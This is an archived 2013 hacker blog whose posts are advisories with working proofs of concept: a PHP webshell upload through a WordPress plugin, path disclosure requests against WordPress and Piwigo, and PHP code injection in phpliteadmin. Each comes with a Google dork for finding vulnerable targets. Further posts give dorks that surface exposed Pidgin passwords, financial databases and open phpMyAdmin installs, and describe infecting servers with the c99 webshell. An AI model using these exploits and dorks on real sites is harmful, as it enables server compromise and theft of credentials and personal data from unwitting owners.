Archive for L@usch

WordPress File Uploader Plugin PHP File Upload Vulnerability with Video Demonstration

January 21, 2013 General Hacking, Hacking Screencasts, My Exploits 3 comments 
# Exploit Title: WordPress File Uploader Plugin PHP File Upload Vulnerability
# Date: 01/21/2013
# Google Dork: inurl:"wp-file-uploader.php"
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-file-uploader-1.1.txt
# Vendor Homepage: http://wordpress.org/extend/plugins/wp-file-uploader/
# Software Link: http://downloads.wordpress.org/plugin/wp-file-uploader.zip
# Version: 1.1 and probably prior
# Tested on: WordPress 3.5 on Windows and Linux

Vulnerable Code: (process-form.php)

97: $filepart = fileinformation( $_FILES['postimage']['name'] );
98: $filename = $filepart['basename'];
99: // check if this filename already exist in the folder
100: $i = 2;
101: while ( in_array( $filename, $imageslist ) ) {
102: $filename = $filepart['filename'] . '_' . $i++ . '.' .$filepart['extension'];
103: }
104:  move_uploaded_file($_FILES["postimage"]["tmp_name"], $file_path.$filename);

Description:

Plugin simply upload the attachment with original name and extension to "wp-content/uploads/".
An attacker can upload php files and access them from remote.

Proof of Concept:

1. Visit vulnerable target and navigate to the "File Uploader" site.
2. Upload a file named shell.php
3. Access it with the browser on example.com/wp-content/uploads/shell.php

Done!

Proof Video: http://goo.gl/ogbsA
YouTube Preview Image

Cheers

L@usch

WordPress 3.5 Path Disclosure Vulnerability

January 19, 2013 General Hacking, My Exploits 2 comments 
# Exploit Title: WordPress 3.5 Path Disclosure Vulnerability
# Date: 01/19/2013
# Google Dork: intext:"powered by WordPress"
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-3.5.txt
# Vendor Homepage: http://wordpress.org/
# Software Link: http://wordpress.org/latest.zip
# Version: 3.5 and probably prior
# Tested on: Windows

Description:

Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the WordPress installation.

Proof of Concept:

--------------------------------------

POST /wordpress/wp-includes/js/tinymce/plugins/spellchecker/rpc.php HTTP/1.1
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

json_data[$hack]=1

--------------------------------------

Done!

Proof: http://goo.gl/PPhWf

Cheers

L@usch

Piwigo 2.4.6 Full Path Disclosure Vulnerability

January 12, 2013 General Hacking, My Exploits No comments

http://la.usch.io/files/exploits/piwigo-2.4.6.txt

# Exploit Title: Piwigo 2.4.6 Full Path Disclosure Vulnerability
# Date: 01/12/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/piwigo-2.4.6.txt
# Vendor Homepage: http://piwigo.org/
# Vendor Status: Informed
# Software Link: http://piwigo.org/download/dlcounter.php?code=latest
# Version: 2.4.6 and probably prior
# Tested on: Windows and Linux

Description:

Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the Piwigo installation.

Proof of Concept:

http://example.com/feed.php?feed=%

Done!

Proof: http://goo.gl/UQm4W

Cheers

L@usch

Hacking Demonstration for phpliteadmin 1.9.3 and prior POC-Exploit – Infect targets with a Webshell

January 11, 2013 General Hacking, Hacking Screencasts 8 comments

Hacking Demonstration Screencast for my POC-Exploit that you can find here:

http://la.usch.io/2013/01/10/phpliteadmin-1-9-3-remote-php-code-injection-vulnerability/

YouTube Preview Image

Google Dork:

http://www.google.com/search?q=inurl:phpliteadmin.php

Cheers

L@usch

phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability Exploit

January 10, 2013 General Hacking, My Exploits No comments

http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt

# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux

Description:

phpliteadmin.php#1784: 'Creating a New Database' => 
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.

Proof of Concept:

1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ

2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ

3. Now we run hack.php

Done!

Proof: http://goo.gl/ZqPVL


Hacking Demonstration Screencast for this Exploit:

http://la.usch.io/2013/01/11/hacking-demonstration-for-phpliteadmin-1-9-3-remote-php-code-injection-vulnerability-infect-targets-with-a-webshell/

Cheers

L@usch

My Google Dork #2 -> Find Gnucash Databases containing juicy info

January 9, 2013 Files containing juicy info No comments

Google Search:

http://goo.gl/rfxR7

Description:

Find Gnucash Databases containing juicy info.

Cheers

L@usch

My Google Dork #1 -> Find Accounts and Passwords from Pidgin users

January 9, 2013 Files containing passwords, General Hacking, My Google Dorks No comments

Google Search:

http://goo.gl/86FyN

Description:

Find Accounts and Passwords from Pidgin Users.
Google limit queries to 32 words so it´s impossible to search for all Account-Types in one query!

List of all Params: Feel free to build your own search query.

proto=’prpl-’; prpl-silc; prpl-simple; prpl-zephyr; prpl-bonjour; prpl-qq; prpl-meanwhile; prpl-novell; prpl-gg; prpl-myspace; prpl-msn; prpl-gtalk; prpl-icq; prpl-aim; prpl-yahoo; prpl-yahoojp; prpl-yah; prpl-irc; prpl-yabber

Cheers

L@usch

GHDB Hacking Demonstration for #3825@exploit-db > How to infect targets with a Webshell over phpMyAdmin

January 8, 2013 General Hacking, GHDB Hacking Demos, Hacking Screencasts No comments

Hacking Demonstration Screencast for
#3825@exploit-db.org/ghdb

I will use this Google Dork to infect my Test Server with a Webshell over phpMyAdmin.

Google GHDB Search result preview:

http://goo.gl/maoTw

Good!, I can see a lot of Websites, that have open phpMyAdmin access that use “root” as MySQL user. Some of them uses Windows as OS and bundled Web server solutions like XAMPP.

So lets simulate a target with VMware. I simply use my Sandbox (Windows 7 x64) and installed XAMPP for Windows.

phpMyAdmin is accessible and use “root” as MySQL user.

As Webshell i use c99.

YouTube Preview Image

Cheers

L@usch

Google hate you!? Or are you just stupid?

January 6, 2013 General Hacking 2 comments

I am so bored today so i played a little with the GHDB from exploit-db.com and modified some searches for a better use and “unique” results.

http://www.exploit-db.com/google-dorks/

I know it since Johnny from hackersforcharity.org release it on his site but i never spent so much enthusiasm for it.

And yes!, that gives me a “little” fun and provide a good way to waste my time!

Its amazing how easy people can “gain access” (im not sure whether we can tell GHDB using = hacking) to random targets with the GHDB!

https://www.google.com/search?q=inurl:/wp-content/w3tc/dbcache/
https://www.google.com/search?q=ext:xml%20(%22mode_passive%22%7C%22mode_default%22)
https://www.google.com/search?q=filetype:xls%20%22username%20%7C%20password%22
https://www.google.com/search?q=inurl:ckfinder%20intext:%22ckfinder.html%22%20intitle:%22Index%20of%20/ckfinder%22

I was little crazy when i saw this and i was thinking about…

“Guys”, whats wrong with “you”. How shamefully that you can get owned by Google searches.

How “you” can store / leave files containing passwords and other sensitive data on your servers? And how you can leave it accessible by google bots and web guests?…

Is the web not unsafe enough without this issue?

I not wondering about such stuff. It´s always the same so i thought this is not so special. But after a short time it became unbelievable for me!, because i found also sensitive data like ftp/ssh/vnc/rdp/… accounts from famous companies, to get access to shops with a lot of credit card information and also direct access to private computers with static ips or dyndns from developers/administrators managing hundreds of servers, backup servers of different companies including source codes from commercial software and also access data for servers from organisations like:

Marvel Studios
Buena Vista
Disney
*.gov* Sites
and
Different IT Service and Security companies *cough* that providing enterprise and gov. solutions.

A little list of clients/partners of some target IT companies: (Domain only for privacy)

***(AT)afc.com
***(AT)telcordia.com
***(AT)siemens.com
***(AT)motorola.com
***(AT)net.com
***(AT)nortelnetworks.com
***(AT)nokia.com
***(AT)huawei.com
***(AT)compuserve.com
***(AT)ectel.com
***(AT)fujitsu.com
***(AT)hp.com
***(AT)mac.com
***(AT)cisco.com
***(AT)francetelecom.com
***(AT)ericsson.com
***(AT)verizon.com
***(AT)vodafone.co.uk
***(AT)vodafone.com
***(AT)tti-telecom.com
***(AT)comcast.net
***(AT)oracle.com
***(AT)sun.com
***(AT)freebsd.org
***(AT)code-forum.org
***(AT)ibm.com
***(AT)t-mobile.com
***(AT)wincor-nixdorf.com
***(AT)unix.net
***(AT)fiberbit.net
***(AT)earthlink.net
***(AT)redhat.com
***(AT)attglobal.net
***(AT)oreilly.com
***(AT)suse.de
***(AT)samsung.com

and a lot more…

Puh, people don´t wondering why/how different “big” companies and systems got owned all the time if they work with such firms…

The funny part was -> Reporting the issues to the people behind a target was more hard than get access to their resources!

I was wondering about this that I really needed more time to find a way to contact the people behind targets :-)

So what i can say?…

Nobody is perfect. We are just humans.
And my mother want me clean my room and this break my creativity.
And my teacher tell me a lot of crap and mostly i believe him.
And three days of coding without sleep results fails.
And i read stupid magazines about security.
And hey i just finish my study and learned to be successful from people who not successful.

And and and…

So, it seems im about to get crazy! I must see how the people that “maybe could be more safe” release all data need to get hacked for public… An open door for everybody!

Lets write a new book guys!

GHDB Book

Hacking with GBDB for Dummies – Fun Cover

I do all this today to waste my time and for feeling better… I think i was not fully successfully :-(
I wasted my time, but im not happy!

So, what i have in my mind now:

Holes, bugs, github, fails, ghdb, open source, gpl, cve, hackers, ddos, missconfiguration, foreign codes, bad coders, good coders, bad work, good work, svn, hackernews, metasploit, sf.net… And all goes in and out and around my head!!! :-D

And if this is not enough for me! -> I was just on finishing this post and then must see this:

https://twitter.com/YourAnonNews/status/288034487361736704

Whats wrong with the security and the people?…

I have to drink a beer now…

Cheers

L@usch

Welcome to my new Blog!

January 6, 2013 Crap No comments

Have a boring day…

So i simply setup my new domain and blog.
Im really happy for my new domain hack and the associated email address :-)

l@ausch.io

But this not helped me out of my boredom today :-(

So i will do a little more now. Lets see what i can do… Come back to see my next post(s) in a hour or some…

L@usch

Page 1 of 212